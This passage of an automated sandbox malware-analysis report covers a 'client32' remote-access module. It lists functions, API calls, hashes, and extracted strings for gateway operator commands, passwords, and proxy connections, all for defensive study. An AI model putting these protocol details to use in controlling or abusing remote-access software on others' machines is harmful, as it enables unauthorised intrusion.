                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 6890556E
                                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 6890557D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$CriticalSection$CountEnterErrorLastLeaveTick_memset$FreeHeapSleep__vswprintf_malloc_sprintf
                                                                                                                                        • String ID: CMD=ADDOPERATOR$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$NEWFN=%s$NEWON=%s$NEWPERMS=%u$NEWPWD=%s$ON=%s$PWD=%s$W$ctl_addoperator - INVALID PARAMETER
                                                                                                                                        • API String ID: 4103114184-1141881251
                                                                                                                                        • Opcode ID: d8a124654367520c97dd26384a9eed880b88d13857110077ab66c144b5280837
                                                                                                                                        • Instruction ID: b1ceda3e02d6c877c951f12700fa5725d793cb178c8eaed7ce632f4ba54602e5
                                                                                                                                        • Opcode Fuzzy Hash: d8a124654367520c97dd26384a9eed880b88d13857110077ab66c144b5280837
                                                                                                                                        • Instruction Fuzzy Hash: 51B187B5D44229AFDB20DBA8CC80FEE77B8AF54304F8044A9E55977141E770EA84CFA1
                                                                                                                                        Function 688FCDB0 Relevance: 52.7, APIs: 11, Strings: 19, Instructions: 247COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 688FCDF0
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,00000000,?), ref: 688FCE13
                                                                                                                                        • InterlockedIncrement.KERNEL32(-6893CB16), ref: 688FCE29
                                                                                                                                        • InterlockedIncrement.KERNEL32(-6893CB86), ref: 688FCE2F
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688FCE36
                                                                                                                                        • _free.LIBCMT ref: 688FCF2C
                                                                                                                                        • _free.LIBCMT ref: 688FCFD7
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 688FD029
                                                                                                                                        • _free.LIBCMT ref: 688FD0CA
                                                                                                                                        • _free.LIBCMT ref: 688FD109
                                                                                                                                        • _free.LIBCMT ref: 688FD115
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$CriticalIncrementInterlockedSection$EnterErrorFreeHeapLastLeave__vswprintf_malloc_memset
                                                                                                                                        • String ID: APPTYPE=%d$CMD=CTL_BROWSE$CONTEXT=%s$CSPEC=%s$CTLTYPE=%d$GSK$GSK=%s$Gateway_Gsk$Gateway_Name$Gateway_Password$Gateway_Username$MATCH_NAME=%s$PWD=%s$REQHOSTNAME=1$REQUSERNAME=1$SERVICETYPE=CLASS$SERVICETYPE=DEPT$USER=%s$WANTSHELP=1
                                                                                                                                        • API String ID: 2543302378-3410294771
                                                                                                                                        • Opcode ID: 5c1d8e401c2b1a7ed44eb107a93f78a37948a32d31b925458ba739946885d95e
                                                                                                                                        • Instruction ID: d536eb4324138aa2a4f791681352ecf5147cbdfa40413ed7da7af1566cb210f0
                                                                                                                                        • Opcode Fuzzy Hash: 5c1d8e401c2b1a7ed44eb107a93f78a37948a32d31b925458ba739946885d95e
                                                                                                                                        • Instruction Fuzzy Hash: 74919676C4022AABCB30DBA4CC40FFE7778AF55204F8448E9E51977541EB31AA85CFA4
                                                                                                                                        Function 688FBED0 Relevance: 44.0, APIs: 7, Strings: 18, Instructions: 200COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 689075B0: _malloc.LIBCMT ref: 689075D8
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 688FBF22
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 688FBF51
                                                                                                                                        • _free.LIBCMT ref: 688FBF7C
                                                                                                                                        • _free.LIBCMT ref: 688FC005
                                                                                                                                        • _free.LIBCMT ref: 688FC034
                                                                                                                                        • _free.LIBCMT ref: 688FC063
                                                                                                                                        • _free.LIBCMT ref: 688FC109
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$_malloc$ErrorFreeHeapLast__vswprintf
                                                                                                                                        • String ID: APPTYPE=%d$BFLG=%d$DA=%d$DATA=$DEPT=%s$ED=%s$ID=%d$MO=%d$OC=%d$SD=%s$TIMING=%d$TM=%s$TZ=%d$UID=%s$UN=%s$WD=%u$WP=%d$YR=%d
                                                                                                                                        • API String ID: 2888336863-1668223812
                                                                                                                                        • Opcode ID: be8666a358fc411c9c9267e4ce52eaa4bfb3ad62e64ff6b7ef0da93b5825c1e1
                                                                                                                                        • Instruction ID: f317e8d7f474b8cc92e2adac619dc1eb9adc2b75d354470f77935bc9921550ce
                                                                                                                                        • Opcode Fuzzy Hash: be8666a358fc411c9c9267e4ce52eaa4bfb3ad62e64ff6b7ef0da93b5825c1e1
                                                                                                                                        • Instruction Fuzzy Hash: A55131B95402287BE7119F25CC80F7F73BCEFA5658F80941CF92996601EB35E90187B5
                                                                                                                                        Function 688FA5C0 Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 292sleeplibraryfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • wsprintfA.USER32 ref: 688FA617
                                                                                                                                        • inet_ntoa.WSOCK32(00000000), ref: 688FA623
                                                                                                                                        • _sprintf.LIBCMT ref: 688FA65D
                                                                                                                                        • _free.LIBCMT ref: 688FA663
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetWriteFile), ref: 688FA6AC
                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 688FA6D0
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 688FA6F9
                                                                                                                                        • Sleep.KERNEL32(00000064,?,?,?,00000000,00000000,?,?,688FACF4,00000000,00000000,?,?,00000010,00000002,00000001), ref: 688FA711
                                                                                                                                        • GetModuleFileNameA.KERNEL32 ref: 688FA7B5
                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,?,?,688FACF4,00000000,00000000), ref: 688FA8E9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLast$AddressCreateModuleNameProcSleep_free_sprintfinet_ntoawsprintf
                                                                                                                                        • String ID: Proxy-Authenticate: Basic$$CONNECT %s:%d HTTP/1.1Host:%s:%d%s$ConnResp247.tmp$Error %d sending HTTP request$Error %d writing inet request$InternetWriteFile$Proxy-Authorization: BASIC %s$Support\
                                                                                                                                        • API String ID: 1677068198-3755747204
                                                                                                                                        • Opcode ID: 75c19d84b3a9bfeaaa91721e62384e7a2a5b36839b3d47f56e0b8b8f7d5d83d7
                                                                                                                                        • Instruction ID: 835307487e819cd19107bb09d7ff7ab726740f4f66cfecd1c15fc8c3fe7f3071
                                                                                                                                        • Opcode Fuzzy Hash: 75c19d84b3a9bfeaaa91721e62384e7a2a5b36839b3d47f56e0b8b8f7d5d83d7
                                                                                                                                        • Instruction Fuzzy Hash: 46B10435A082199FCB20CF54DC58FEAB3B4EF8A355F4184B9E959A7250DB30AD85CF90
                                                                                                                                        Function 689055A0 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 232sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 689055D7
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 6890564C
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 6890566B
                                                                                                                                        • _free.LIBCMT ref: 68905743
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 689057C4
                                                                                                                                        • _free.LIBCMT ref: 689057CD
                                                                                                                                        • GetTickCount.KERNEL32 ref: 689057DB
                                                                                                                                        • GetTickCount.KERNEL32 ref: 689057E8
                                                                                                                                        • Sleep.KERNEL32(00000014,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 689057FE
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68905824
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68905862
                                                                                                                                        • _free.LIBCMT ref: 6890578D
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                          • Part of subcall function 68907B60: _sprintf.LIBCMT ref: 68907B77
                                                                                                                                          • Part of subcall function 689077E0: _free.LIBCMT ref: 689077EF
                                                                                                                                        • _free.LIBCMT ref: 68905880
                                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 6890588C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$CriticalSection$CountEnterErrorLastLeaveTick$FreeHeapSleep__vswprintf_malloc_memset_sprintf
                                                                                                                                        • String ID: CMD=REMOVEOPERATOR$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$ON=%s$PWD=%s$REMON=%s$W$ctl_removeoperator - INVALID PARAMETER
                                                                                                                                        • API String ID: 2014206688-1244755732
                                                                                                                                        • Opcode ID: 0418f40422abc0996183713d4d71d91bf0f3d783df6322423ce489242653baad
                                                                                                                                        • Instruction ID: 4e995525da347e99858430cb697555e8352e22b94e95b2f1feba13b769ccda80
                                                                                                                                        • Opcode Fuzzy Hash: 0418f40422abc0996183713d4d71d91bf0f3d783df6322423ce489242653baad
                                                                                                                                        • Instruction Fuzzy Hash: 5F918275D04218AFDB10DFE8CC44BEE77B9AF85308F904429E919AB241EB71D945CF61
                                                                                                                                        Function 689058B0 Relevance: 40.5, APIs: 7, Strings: 16, Instructions: 262stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$_memset$lstrlen
                                                                                                                                        • String ID: *ControlPort$*Gsk$AT=%d$CHANNEL=%s$CMD=BROADCASTDATA$CSPEC=%s$DATA=$FLAGS=%u$FROM=%s:%d$GSK=%s$Gateway_Gsk$LEN=%d$ListenPort$Port$TCPIP$ctl_broadcastdata - INVALID PARAMETER
                                                                                                                                        • API String ID: 1776203170-3520600413
                                                                                                                                        • Opcode ID: 9f5c28b980f3f5dbfb1d5f1e8f46af6200496184c99759ba8080f1e25c18ba00
                                                                                                                                        • Instruction ID: b4fb66244bfa7cbd91a8a03acf35cab042706bf8215df9f566d212f4958c8d94
                                                                                                                                        • Opcode Fuzzy Hash: 9f5c28b980f3f5dbfb1d5f1e8f46af6200496184c99759ba8080f1e25c18ba00
                                                                                                                                        • Instruction Fuzzy Hash: 57A17875944229BFDB20DB98CC88FAF737CAF95305F8045D9E159A6140EB30DA84CF61
                                                                                                                                        Function 688F94E0 Relevance: 40.5, APIs: 9, Strings: 14, Instructions: 244COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • wsprintfA.USER32 ref: 688F9533
                                                                                                                                        • wsprintfA.USER32 ref: 688F9547
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688F9588
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688F95A9
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688F95CB
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,025E2EF8), ref: 688F962A
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,025E2EF8), ref: 688F966F
                                                                                                                                        • wsprintfA.USER32 ref: 688F970C
                                                                                                                                        • _free.LIBCMT ref: 688F9782
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcstoui64wsprintf$CriticalSection$EnterLeave_free
                                                                                                                                        • String ID: %02x $%02x %02x$CID$CRC$DATA$Error. Out of order packet, this seqno=%d, expected=%d$LEN$SEQ$Sessionz %dz #%u Recv %-4u bytes %s$actual_crc == crc$assume packet lost so we must disconnect$decodedlen == nc_len$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$xx %02x
                                                                                                                                        • API String ID: 3151195128-3323951505
                                                                                                                                        • Opcode ID: 0e1fa67c76b046108ef170aeacd10f2a4bb984486c860138b8e5d4a812515d58
                                                                                                                                        • Instruction ID: 1907a8074b155a666b71a882b6753829c7cd8ae47723ef13d7ebdab7f5f7408e
                                                                                                                                        • Opcode Fuzzy Hash: 0e1fa67c76b046108ef170aeacd10f2a4bb984486c860138b8e5d4a812515d58
                                                                                                                                        • Instruction Fuzzy Hash: 3E81DB75D44325AFDF209FA88C80BBE7778AF45388F904539F815A7241E735E9068BA2
                                                                                                                                        Function 688FEEA0 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 182sleepsynchronizationthreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetEvent.KERNEL32(00000318), ref: 688FEEC7
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000304,00001388), ref: 688FEED5
                                                                                                                                        • TerminateThread.KERNEL32(00000304,000000FF), ref: 688FEEF5
                                                                                                                                        • CloseHandle.KERNEL32(00000304), ref: 688FEF07
                                                                                                                                        • SetEvent.KERNEL32(00000310), ref: 688FEF16
                                                                                                                                        • ctl_hangup.HTCTL32(00000001), ref: 688FEF26
                                                                                                                                        • Sleep.KERNEL32(00000014), ref: 688FEFB8
                                                                                                                                        • CloseHandle.KERNEL32(00000318), ref: 688FEFCE
                                                                                                                                        • CloseHandle.KERNEL32(00000314), ref: 688FEFD6
                                                                                                                                        • CloseHandle.KERNEL32(00000310), ref: 688FEFDF
                                                                                                                                        • WSACleanup.WSOCK32 ref: 688FEFE9
                                                                                                                                        • CloseHandle.KERNEL32(00000300), ref: 688FEFFB
                                                                                                                                        • DeleteCriticalSection.KERNEL32(00000002), ref: 688FF01F
                                                                                                                                        • DeleteCriticalSection.KERNEL32(6893B898), ref: 688FF03A
                                                                                                                                        • _free.LIBCMT ref: 688FF043
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 688FF04F
                                                                                                                                        • _free.LIBCMT ref: 688FF07B
                                                                                                                                        • _free.LIBCMT ref: 688FF08D
                                                                                                                                        • _memset.LIBCMT ref: 688FF0A1
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 688FF0BB
                                                                                                                                        • timeEndPeriod.WINMM(00000001), ref: 688FF0D6
                                                                                                                                          • Part of subcall function 688F4610: DeleteCriticalSection.KERNEL32(-00000008,?), ref: 688F4698
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$_free$CriticalDeleteSection$EventFree$CleanupErrorHeapLastLibraryObjectPeriodSingleSleepTerminateThreadWait_memsetctl_hanguptime
                                                                                                                                        • String ID: CMD=CLOSE$Error. Terminating httprecv Thread
                                                                                                                                        • API String ID: 2861375113-448471891
                                                                                                                                        • Opcode ID: b6645bbf7550cae8485db53a2976ae405f5b0b667f7ddb2cc8c5bddee78c6b13
                                                                                                                                        • Instruction ID: 37edd1593a55095c82e82c0ffcc7f72b19983312c93718d37f5027c49af520b6
                                                                                                                                        • Opcode Fuzzy Hash: b6645bbf7550cae8485db53a2976ae405f5b0b667f7ddb2cc8c5bddee78c6b13
                                                                                                                                        • Instruction Fuzzy Hash: D3519475A08619AFDB30DFB8CC8096F73B8AF96348B800935E515D7640DB75E941CBA1
                                                                                                                                        Function 68917127 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 6891712F
                                                                                                                                        • __mtterm.LIBCMT ref: 6891713B
                                                                                                                                          • Part of subcall function 68916DFA: DecodePointer.KERNEL32(00000007,68915978,6891595E,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 68916E0B
                                                                                                                                          • Part of subcall function 68916DFA: TlsFree.KERNEL32(0000001B,68915978,6891595E,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 68916E25
                                                                                                                                          • Part of subcall function 68916DFA: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,68915978,6891595E,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 6891F391
                                                                                                                                          • Part of subcall function 68916DFA: _free.LIBCMT ref: 6891F394
                                                                                                                                          • Part of subcall function 68916DFA: DeleteCriticalSection.KERNEL32(0000001B,?,?,68915978,6891595E,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 6891F3BB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 68917151
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6891715E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6891716B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 68917178
                                                                                                                                        • TlsAlloc.KERNEL32(?,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 689171C8
                                                                                                                                        • TlsSetValue.KERNEL32(00000000,?,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 689171E3
                                                                                                                                        • __init_pointers.LIBCMT ref: 689171ED
                                                                                                                                        • EncodePointer.KERNEL32(?,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 689171FE
                                                                                                                                        • EncodePointer.KERNEL32(?,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 6891720B
                                                                                                                                        • EncodePointer.KERNEL32(?,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 68917218
                                                                                                                                        • EncodePointer.KERNEL32(?,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 68917225
                                                                                                                                        • DecodePointer.KERNEL32(Function_00026F7E,?,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 68917246
                                                                                                                                        • __calloc_crt.LIBCMT ref: 6891725B
                                                                                                                                        • DecodePointer.KERNEL32(00000000,?,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 68917275
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 68917287
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
